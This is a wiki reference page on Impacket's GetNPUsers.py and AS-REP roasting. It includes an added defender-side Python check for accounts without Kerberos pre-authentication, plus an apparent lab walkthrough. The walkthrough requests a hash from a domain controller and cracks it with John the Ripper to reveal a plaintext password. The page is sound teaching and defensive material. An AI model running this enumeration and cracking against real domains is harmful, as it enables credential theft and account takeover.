Impacket/GetNPUsers

From aldeid

Description

This script attempts to list, and to request TGTs for, those users that have the 'Do not require Kerberos preauthentication' property (UF_DONT_REQUIRE_PREAUTH) set.

For each user with that configuration, a hash in John the Ripper format is written out so that it can be sent for cracking.
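The account property this script enumerates, and the AS-REP exchange it triggers, both leave traces that can be checked from the defender's side. The following added Python example (not from the aldeid page or from Impacket) flags enabled accounts whose userAccountControl carries UF_DONT_REQUIRE_PREAUTH and flags Windows Security 4768 events issued without pre-authentication; the userAccountControl values, log lines and client IP addresses are constructed for the example.

```python
# Added example (not from the aldeid page or from Impacket): two defender-side
# checks for the condition that GetNPUsers.py enumerates. All data is constructed.
import re

UF_ACCOUNTDISABLE = 0x000002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # the userAccountControl bit GetNPUsers.py looks for

def accounts_without_preauth(entries):
    """Return enabled accounts whose userAccountControl has UF_DONT_REQUIRE_PREAUTH set.

    `entries` maps sAMAccountName -> userAccountControl, as returned by an LDAP
    query or by `Get-ADUser -Filter * -Properties userAccountControl`.
    """
    return sorted(name for name, uac in entries.items()
                  if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE)

# Minimal parser for the key=value form in which a 4768 (Kerberos TGT requested)
# event is commonly forwarded by a log shipper; field names follow the Windows schema.
_KV = re.compile(r"(\w+)=(\S+)")

def as_rep_roast_candidates(log_lines):
    """Return (account, client_ip, rc4_used) for 4768 events issued without pre-auth.

    PreAuthType 0 means the KDC issued the TGT with no pre-authentication exchange,
    which is exactly what an AS-REP roasting request produces. RC4
    (TicketEncryptionType 0x17, john's etype 23) makes the hash cheap to crack,
    so that is reported as well.
    """
    hits = []
    for line in log_lines:
        f = dict(_KV.findall(line))
        if f.get("EventID") != "4768" or f.get("PreAuthType") != "0":
            continue
        hits.append((f["TargetUserName"], f["IpAddress"],
                     f.get("TicketEncryptionType") == "0x17"))
    return hits

# Constructed sample data: svc_bes has no pre-auth, old_svc too but is disabled.
SAMPLE_UAC = {"svc_bes": 0x410200, "jdoe": 0x10200, "old_svc": 0x400202}
SAMPLE_LOG = [
    "EventID=4768 TargetUserName=svc_bes PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.7",
    "EventID=4768 TargetUserName=jdoe PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.10.50",
    "EventID=4769 TargetUserName=jdoe PreAuthType=0 TicketEncryptionType=0x12 IpAddress=10.10.10.50",
]

if __name__ == "__main__":
    print(accounts_without_preauth(SAMPLE_UAC))   # ['svc_bes']
    print(as_rep_roast_candidates(SAMPLE_LOG))    # [('svc_bes', '10.10.14.7', True)]
```

Remediation for a flagged account is to clear the bit (re-enable pre-authentication) and, where a service still needs the exception, to give that account a long random password and AES-only encryption types.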

Example

Full story here.

It’s worth checking if Kerberos pre-authentication has been disabled for this account, which means it is vulnerable to ASREPRoasting. We can check this using a tool such as Impacket’s GetNPUsers.

$ GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes
[email protected]:00c4e7b0ce1ad5034[REDACTED]960b67401854

We obtain the TGT ticket for the svc_bes account and save it to a file called hash. We can use Hashcat or John-The-Ripper in conjunction with rockyou.txt to obtain the plaintext password Sheffield19.

$ /data/src/john/run/john hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ([email protected])
1g 0:00:00:18 DONE (2020-06-13 21:28) 0.05387g/s 571282p/s 571282c/s 571282C/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.